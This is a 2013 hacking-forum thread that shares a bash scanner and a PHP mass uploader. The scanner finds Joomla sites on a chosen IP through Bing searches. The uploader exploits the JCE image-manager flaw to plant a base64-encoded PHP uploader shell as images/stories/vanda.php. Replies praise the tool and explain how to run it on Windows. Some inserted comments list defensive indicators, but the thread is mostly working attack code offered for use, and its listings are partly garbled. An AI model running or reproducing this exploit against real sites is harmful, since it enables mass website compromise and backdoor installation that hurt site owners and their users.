MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Server Jce Scanner && Exploiter



08-27-2013, 10:26 PM #1
Beni_Vanda Offline Respected *****
Respected
Posts:21 Threads:5 Joined:Jun 2013 Reputation: 0
Mood: None
[Image: 137760525219334_jce-exploiter.png]

D3m00 : http://www.mediafire.com/download/slq8r7...51/jce.mp4



insert jce.php beside bash script :


bash script :

Bash Code:
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per  
# http://redhat-viper.blogspot.com
# Report Bugs : [email protected]
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz   : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com 
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#


#-------------------- Red V!per Banner ----------------------------------------------------------------------------
# Banner: clears the terminal, prints the author's ASCII-art banner and the
# tool title, waits three seconds, then prompts for the target IP address.
# Globals:   B, N (read) - ANSI sequences assigned later in the file;
#            IP (named on the `read` line, used afterwards in the search URL)
# Arguments: none
# Outputs:   banner, title and the "[*] Target Ip : " prompt on the terminal
# NOTE(review): this listing was damaged when the page was extracted (the
# options after `echo -` / `read -` are truncated and several statements are
# split across lines), so it is not runnable as shown.
Banner()
{
clear 
echo -'\E[34m'" ||______________________________________________________|| "tput sgr0
echo -'\E[34m'" ||------------------------------------------------------|| "tput sgr0
echo -'\E[34m'" ||------------------------------------------------------|| "tput sgr0
echo -'\E[34m'" ||                                                      || "tput sgr0
echo -'\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "tput sgr0 
echo -'\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m                               | |                    \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[31m                               |_|                    \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m   _                                                  \E[34m|| "tput sgr0     
echo -'\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "tput sgr0  
echo -'\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "tput sgr0
echo -'\E[34m'" ||\E[32m|__/                                                  \E[34m|| "tput sgr0
echo -'\E[34m'" ||------------------------------------------------------|| "tput sgr0
echo -'\E[34m'" ||------------------------------------------------------|| "tput sgr0
echo -'\E[34m'" ||______________________________________________________|| "tput sgr0
sleep 3
echo
echo -
"$B /\ (^_^) /\ [public] \n"
echo -" -===============================================-\n"
echo -"   Server Jce Scanner && Exploiter"
echo  
echo -
"   BY : Red V!per\n"
echo -" -===============================================-"
echo
echo
echo -
" -========== [         INFO         ] ===========-"
echo
read -"[*] Target Ip : " IP
echo -"$N"
}

#-------------------- Variables ----------------------------------------------------------------------------

# ANSI SGR escape sequences used when printing status lines.
# B = bold on
B="\033[1m"
# N = reset all attributes
N="\033[0m"
# L = blink (not referenced in the visible part of the script)
L="\033[5m"
# C = reset (empty parameter; not referenced in the visible part of the script)
C="\033[m"

#-------------------- Scanning Jce Targets on Server  -------------------------------------------------------

# scan_jce_on_victim: enumerates sites hosted on $IP and hands candidates to
# jce.php.
# Globals:   IP (read), B (read)
# Files:     domain_bing.php, alldomain_bing.txt, domains.txt, site.lst,
#            shells.lst (work files, deleted at the end); vanda_shells.lst
#            (appended to, kept)
# What the visible code does:
#   1. Pages through Bing results for "ip:$IP" plus 'index.php?option=com_',
#      fetching each page with wget under a fixed Firefox 3.0b5 User-Agent,
#      and collects the result links into alldomain_bing.txt.
#   2. Lower-cases the links, strips scheme, "www." and the query string, and
#      writes the de-duplicated hosts to domains.txt.
#   3. For every host, requests the JCE image-manager URL held in
#      $image_manager; when the reply contains "OK" it appears to write the
#      host to site.lst and runs `php jce.php site.lst shells.lst`.
#   4. Requests /images/stories/vanda.php on the host and looks for the string
#      "GIF89a1"; matches are reported and appended to vanda_shells.lst.
# Defender notes: the traffic this produces is recognisable in web logs as
# requests for index.php?option=com_jce&task=plugin&plugin=imgmanager
# followed by a request for /images/stories/vanda.php. A file of that name, or
# any file under images/ that starts with a GIF header and contains PHP, should
# be treated as a compromise indicator. Keeping the JCE component up to date
# and denying script execution in upload directories removes the exposure.
# NOTE(review): the listing is damaged by page extraction (pipe characters and
# some option letters are missing, several quotes are unbalanced), so it is
# not runnable as shown.
scan_jce_on_victim()
{
page=0  
how_many
=1  
single_page
=  
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"

 
while [ -"$last_page_check] && [ -"$how_many] && [ -"$single_page]; do  
  
url="http://www.bing.com/search?q=ip:$IP+'index.php?option=com_'&qs=n&pq=ip:$IP+'index.php?option=com_'&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"  
  
 
wget --O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"  
  
 
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`  
    
 
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`  
  
 
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `  
  
  
  
cat domain_bing.php egrep -"<h3><a href=\"[^\"]+" domain_bing.php cut -'"' -f 2 >> alldomain_bing.txt  
  rm 
-f domain_bing.php  
  let page
=$page+1   
  done  
  
cat alldomain_bing
.txt grep "com_" tr '[:upper:]' '[:lower:]' awk '{gsub("http://","")}1' awk '{gsub("https://","")}1' sed '/www./s///g' cut -'?' -f 1 awk '{gsub("/index.php","")}1' sort uniq >> domains.txt
  
for domain in `cat domains.txt`  
   do  
     
GET -sd "http://www.$domain/$image_managergrep "OK" >> /dev/null;check=$?
      if [ 
$check -eq 0 ]
         
then
           
echo "www.$domainsite.lst
           php jce
.php site.lst shells.lst
        GET 
-"http://www.$domain/images/stories/vanda.php" grep "GIF89a1" >> /dev/null;check2=$?
        if [ 
$check2 -eq 0 ]
        
then
        
echo -"$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
        
echo -"$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
        
echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
        
else
        echo 
"[-] www.$domain/ [No] "
        
fi    
       
else
         echo 
"[-] www.$domain/ [No] "
      
fi    
   done  
rm 
-rf alldomain_bing.txt 
rm 
-rf domains.txt 
rm 
-rf site.lst 
rm 
-rf shells.lst
}

#-------------------- Remove  ------------------------------------------------------------------------
# all_remove: deletes work files left in the current directory by earlier runs.
# Arguments: none
# NOTE(review): every pattern is an unquoted prefix glob passed to `rm -rf`
# relative to whatever directory the script was started in, so `site*`,
# `domains*` and the others remove ANY matching file or directory there, not
# only this tool's output. `domains_f*` and `alldomain_bing*` are each listed
# twice; the second pass has nothing left to remove.
all_remove()
{
 
rm -rf alldomain_bing*
 
rm -rf domains_f*
 
rm -rf domains_f*
 
rm -rf domain_bing*  
 
rm -rf alldomain_bing*
 
rm -rf domains*
 
rm -rf jce_server*
 
rm -rf site*
}

#-------------------- Main Brain :D  ------------------------------------------------------------------------
# main: entry point. Marks jce.php executable, makes sure shells.lst exists,
# then runs Banner (prompt for the target IP), all_remove (delete old work
# files) and scan_jce_on_victim, in that order.
# Arguments: none
# NOTE(review): jce.php is expected in the current directory; nothing here
# checks that it exists or that the `php` interpreter is available.
main()
{
chmod +x jce.php 

if [ ! -f shells.lst ]; then
    touch shells
.lst ;
fi

Banner
;
all_remove;
scan_jce_on_victim;
}

# Script entry point: runs immediately when the file is executed.
main

jce.php :

PHP Code:
<?php

/*
# Mass Uploader   
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/

    
// Script-wide setup.
// NOTE(review): the listing was damaged by page extraction (assignment
// operators, commas and concatenation dots are missing), so it is not valid
// PHP as shown.
// $kirilmis: counter, incremented further down each time the marker string is
// found on a target (Turkish, roughly "compromised").
$kirilmis 0;

    
// $taranmis: counter, incremented once per processed target (Turkish,
// roughly "scanned").
$taranmis 0;

    
// All PHP error output is suppressed.
error_reporting(0);

    
// No execution time limit for the run.
ini_set("max_execution_time"0);

    
// Default socket timeout of 3 (seconds, per the PHP setting's definition).
ini_set("default_socket_timeout"3);

    // oku ("read" in Turkish): fetches $link over a raw socket and returns
    // the raw response text (status line, headers and body together).
    // @param  string $link  absolute URL; only its host and path are used
    // @return string|null   whatever was read from the socket
    // NOTE(review): $httpresponse is initialised but $http_response is the
    // variable that is appended to and returned, so when the connection
    // fails the function returns an undefined variable. The
    // "Connection: close" line is written after the blank line that already
    // ended the request headers.
    function 
oku($link)

    {

        
$site         parse_url($link);

        
$link         $site["path"];

        
$site         $site["host"];

        
$httpresponse "";

        
$fp           fsockopen($site80$err_num$err_msg30);

        if (
$fp) {

            
fputs($fp"GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");

            
fputs($fp"Connection: close\n\n");

            while (!
feof($fp)) {

                
$http_response .= fgets($fp128);

            }

            
fclose($fp);

        }

        return 
$http_response;

    }

    
// Command-line inputs.
// $argv[1]: path of the target list (one host or URL per line).
$dosya      $argv[1];

    
// $argv[2]: output file; mode 'w' truncates any existing content.
$kirilanlar fopen($argv[2], 'w');

    
// Whole target list is read into memory, one array element per line.
$okunan file($dosya);

    
// Number of targets; not referenced again in the visible code.
$toplam count($okunan);

    // Per-target loop. For each line of the input list the visible code:
    //   1. derives the host name (prepending "http://" when no scheme is given);
    //   2. opens a TCP connection and writes a fixed non-HTTP string;
    //   3. sends a multipart POST to the JCE image-manager endpoint carrying a
    //      file named mua.gif whose content is a GIF header line followed by PHP;
    //   4. sends a second POST whose JSON body calls folderRename to rename
    //      /mua.gif to vanda.php;
    //   5. fetches /images/stories/vanda.php and records the URL in the output
    //      file when the response contains "GIF89a1".
    // Defender notes - fixed values in this code that can be matched in web
    // and WAF logs: the User-Agent strings "BOT/0.1 (BOT for JCE)" and "Mua ",
    // the multipart boundary ending in 41184676334, the hard-coded cookie
    // values, the probe string "Mua-Kontrol-Paketi-Panpa", a JSON body with
    // "fn":"folderRename", and the file names mua.gif / vanda.php under
    // images/stories. The technique depends on the server accepting a file by
    // its GIF magic bytes and on PHP being executable in the upload directory;
    // updating the JCE component, validating uploads by content, and denying
    // script execution under images/ remove the exposure.
    // NOTE(review): $hatalisite is set but not used, and $p is never assigned,
    // in the visible code.
    foreach (
$okunan as $sira => $satir) {

        
$hatalisite 0;

        
$satir      preg_replace("/[\\n\\r]+/"""$satir);

        
$url        parse_url($satir);

        if (
$url["scheme"])

            
$host $url["host"];

        else {

            
$url  parse_url("http://" $satir);

            
$host $url["host"];

        }


        // Step 2: fixed marker string written to the target before any HTTP request.
        
$packet "Mua-Kontrol-Paketi-Panpa";


        
$fp fsockopen('tcp://' $host80$errno$errstr5);

        if (
$fp) {

            
fwrite($fp$packet);

            
fclose($fp);

        }

        // Uploaded file content: a "GIF89a1" line so the file passes a
        // magic-byte image check, followed by base64-encoded PHP run through
        // eval(). The encoded part appears to decode to a small HTML
        // file-upload form - i.e. the dropped file is an uploader web shell.
        
$content "GIF89a1\n";

        
$content .= '<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>';

        // Step 3: multipart/form-data body (fields upload-dir, Filedata,
        // upload-overwrite, action) built by hand with a fixed boundary.
        
$data "-----------------------------41184676334\r\n";

        
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";

        
$data .= "/\r\n";

        
$data .= "-----------------------------41184676334\r\n";

        
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";

        
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";

        
$data .= "-----------------------------41184676334\r\n";

        
$data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";

        
$data .= "0\r\n";

        
$data .= "-----------------------------41184676334\r\n";

        
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";

        
$data .= "Content-Type: image/gif\r\n\r\n";

        
$data .= "$content\r\n";

        
$data .= "-----------------------------41184676334\r\n";

        
$data .= "0day\r\n";

        
$data .= "-----------------------------41184676334\r\n";

        
$data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";

        
$data .= "upload\r\n";

        
$data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";

        // Upload request headers; the User-Agent and cookie values are constants.
        
$packet "POST " $p "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";

        
$packet .= "Host: " $host "\r\n";

        
$packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";

        
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";

        
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";

        
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        
$packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";

        
$packet .= "Connection: Close\r\n";

        
$packet .= "Proxy-Connection: close\r\n";

        
$packet .= "Content-Length: " strlen($data) . "\r\n\r\n\r\n\r\n";

        
$packet .= $data;


            
$fp fsockopen('tcp://' $host80$errno$errstr5);

            if (
$fp) {

                
fwrite($fp$packet);

                
fclose($fp);

            }


        // Step 4: rename request. The response is never read, so success is
        // only inferred from the follow-up fetch below.
        
$packet "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";

        
$packet .= "Host: " $host "\r\n";

        
$packet .= "User-Agent: Mua \r\n";

        
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

        
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";

        
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        
$packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";

        
$packet .= "Accept-Encoding: deflate\n";

        
$packet .= "X-Request: JSON\r\n";

        
$packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";

        
$ren "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";

        
$packet .= "Content-Length: " strlen($ren) . "\r\n\r\n";

        
$packet .= $ren "\r\n\r\n";

            
$fp fsockopen('tcp://' $host80$errno$errstr5);

            if (
$fp) {

                
fwrite($fp$packet);

                
fclose($fp);

            }

        // Step 5: verification fetch.
        // NOTE(review): strpos() is compared loosely with true, so a match at
        // offset 0 would count as "not found"; oku() returns the headers
        // together with the body, so the marker normally sits at a non-zero
        // offset.
        
$taranmis $taranmis 1;

            
$kod      oku("http://" $host "/images/stories/vanda.php");

            
$pozisyon strpos($kod"GIF89a1");

            if (
$pozisyon == true) {

                
$kirilmis $kirilmis 1;

                
fwrite($kirilanlar"http://" $host "/images/stories/vanda.php\r\n");

            }
    } 
//for each


    
// NOTE(review): $yaz is never assigned in the visible code, so this call
// operates on an undefined variable (the warning is hidden by
// error_reporting(0)).
fclose($yaz);

    
// Closes the output file opened from $argv[2].
fclose($kirilanlar); 

bash script : http://www.mediafire.com/download/2rk5ik...ploiter.sh

jce.php : http://www.mediafire.com/download/p8210a...9y/jce.php

08-27-2013, 10:34 PM #2
sniffer Offline Bug Researchers **********
Junior Administrator
Posts:878 Threads:126 Joined:Sep 2012 Reputation: 12
Mood: Happy
thanks a lot bro very good +rep

jabber : [email protected]

08-27-2013, 11:14 PM #3
canomer Offline Junior Member **
Registered
Posts:1 Threads:0 Joined:Aug 2013 Reputation: 0
Mood: None
Hello I can't use with backtrack 5 r3 Why ?

08-27-2013, 11:22 PM #4
Beni_Vanda Offline Respected *****
Respected
Posts:21 Threads:5 Joined:Jun 2013 Reputation: 0
Mood: None
hello bro Smiley1
u can use bash scripts in all linux's kernel
insert this scripts in same directory . and watch demoo video ...

08-28-2013, 12:57 AM #5
dabeeyow Offline Junior Member **
Registered
Posts:6 Threads:0 Joined:Jul 2013 Reputation: 0
Mood: None
How to run this on Windows? Thanks in advance.

08-28-2013, 01:48 AM #6
Beni_Vanda Offline Respected *****
Respected
Posts:21 Threads:5 Joined:Jun 2013 Reputation: 0
Mood: None
for better performance please use this script a unix/linux os ...

08-28-2013, 04:13 AM #7
sniffer Offline Bug Researchers **********
Junior Administrator
Posts:878 Threads:126 Joined:Sep 2012 Reputation: 12
Mood: Happy
if you need run this script in windows first you need install cygwin (http://www.cygwin.com/)

jabber : [email protected]

08-28-2013, 10:36 AM #8
dabeeyow Offline Junior Member **
Registered
Posts:6 Threads:0 Joined:Jul 2013 Reputation: 0
Mood: None
I already installed Cygwin. It's working great now. Thanks! Smiley1

08-28-2013, 01:30 PM #9
Diizzy Offline cat /etc/passwd ***
TeaM MaDLeeTs
Posts:146 Threads:5 Joined:Jul 2013 Reputation: 1
Mood: Say What
Nice Work Biggrinsmiley .... Thanks Bro wink

 
--------------------------------------
Facebook | Twitter

--------------------------------------

08-30-2013, 08:29 PM #10
nightmare Offline Banned
Posts:160 Threads:63 Joined:Jun 2013
Mood: None
nice one, but i don't think there are any more exploitable sites now





